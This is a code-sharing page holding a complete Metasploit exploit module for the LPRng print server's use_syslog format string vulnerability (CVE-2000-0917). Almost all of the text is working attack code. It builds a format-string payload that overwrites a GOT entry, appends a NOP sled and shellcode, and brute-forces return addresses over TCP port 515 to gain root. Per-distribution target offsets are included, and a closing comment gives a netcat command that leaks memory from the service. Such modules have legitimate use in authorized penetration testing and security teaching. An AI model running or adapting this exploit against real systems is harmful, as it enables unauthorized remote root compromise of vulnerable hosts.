扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 |
## # $Id: lprng_format_string.rb 9666 2010-07-03 01:09:32Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Brute include Msf::Exploit::FormatString def initialize(info = {}) super(update_info(info, 'Name' => 'LPRng use_syslog Remote Format String Vulnerability', 'Description'=> %q{ This module exploits a format string vulnerability in the LPRng print server. This vulnerability was discovered by Chris Evans. There was a publicly circulating worm targeting this vulnerability, which prompted RedHat to pull their 7.0 release. They consequently re-released it as "7.0-respin". }, 'Author' => [ 'jduck' ], 'License'=> MSF_LICENSE, 'Version'=> '$Revision: 9666 $', 'References' => [ [ 'CVE', '2000-0917' ], [ 'OSVDB', '421' ], [ 'BID', '1712' ], [ 'US-CERT-VU', '382365' ], [ 'URL', 'http://www.cert.org/advisories/CA-2000-22.html' ], [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=17756' ], [ 'URL', 'http://www.exploit-db.com/exploits/226' ], [ 'URL', 'http://www.exploit-db.com/exploits/227' ], [ 'URL', 'http://www.exploit-db.com/exploits/230' ] ], 'Platform' => 'linux', 'Arch' => ARCH_X86, 'Privileged' => true, # root 'DefaultOptions' => { 'PrependSetresuid' => true }, 'Payload'=> { 'Space'=> 130, # buffer size on caldera is 180! (need ~50 for fmt) 'BadChars' => "\x00\x0a\x20\x25", }, 'Targets'=> [ # tested OK - jjd [ 'Caldera OpenLinux 2.3 Bruteforce', { 'Platform' => 'linux', 'NumPops'=> 243, 'FlowHook' => 0x80992d4,# GOT of exit # (0x809c180+(41+4+10+48)) - data segment, but gets corrupted 'Bruteforce' => { 'Start' => { 'Ret' => 0xcffffff4 }, 'Stop'=> { 'Ret' => 0x7fffe004 }, 'Step'=> 16 } } ], =begin # untested (from public exploits) [ 'Slackware 7.0 LPRng-3.6.22.tgz - started from shell', { 'NumPops' => 299, 'Ret' => 0xbffff640, 'FlowHook' => 0xbfffee30 } ], [ 'RedHat 7.0 (Guinness) with LPRng-3.6.22/23/24-1 from rpm - glibc-2.2-5', { 'NumPops' => 304, 'Ret' => 0xbffff920, 'FlowHook' => 0xbffff0f0 } ], [ 'RedHat 7.0 - Guinesss', { 'NumPops' => 300, 'Ret' => 0x41424344, 'FlowHook' => 0xbffff3ec } ], [ 'RedHat 7.0 - Guinesss-dev', { 'NumPops' => 300, 'Ret' => 0x41424344, 'FlowHook' => 0xbffff12c } ], =end # ... [ 'Debug', { 'NumPops' => 1, # sure to miss. 'Ret' => 0x41424344, 'FlowHook' => 0x45464748 } ] ], # 'DefaultTarget' => 0, 'DisclosureDate' => 'Sep 25 2000')) register_options( [ Opt::RPORT(515) ], self.class ) end def exploit # we want to use DPA for this one :) fmtstr_set_caps(false, true) # check syslog to see which number hits 41414141 =begin 400.times { |x| connect buf = "aAAAABBBB|%%%u$x|%u\n" % [x+1, x+1] sock.put(buf) #handler disconnect } =end print_status("Trying target #{target.name} ..") super end def brute_exploit(addrs) #print_status("Trying target #{target.name} - addr 0x%x..." % addrs['Ret']) printed = "Service_connection: bad request line '\\35" # + "'XXXYYYYZZZZ... num_start = printed.length + 2 + 4 # write 'ret' addr to flowhook (execute shellcode) # NOTE: the resulting two writes must be done at the same time # characters (chr(10) > X > chr(99)) will screw up alignment (\XXX in syslog) fmtbuf = "_" * 4 fmtbuf << generate_fmt_two_shorts(num_start, target['FlowHook'], addrs['Ret']) #print_status(" hijacker format string buffer is #{fmtbuf.length} bytes") # append payload and newline #fmtbuf << payload.encoded fmtbuf << "\x90" * 32 fmtbuf << Rex::Text.charset_exclude(payload_badchars) fmtbuf << "\n" print_status(" writing 0x%x to 0x%x" % [addrs['Ret'], target['FlowHook']]) connect #print_status("Sleeping, attach now!!") #select(nil,nil,nil,5) sock.put(fmtbuf) handler disconnect end end =begin HRM! The following causes info leakage! bash$ ( ruby -e 'puts "\x09" + ("%x" * 50) + "\n"'; cat) | nc 192.168.0.120 515 | hexdump -vC There are various other ways to trigger the vulnerability. LPD uses the single-byte commands 0x01 -> 0x09... It's unclear if there is a way to auto-detect the lpd version via LPD commands. =end |
体验盒子
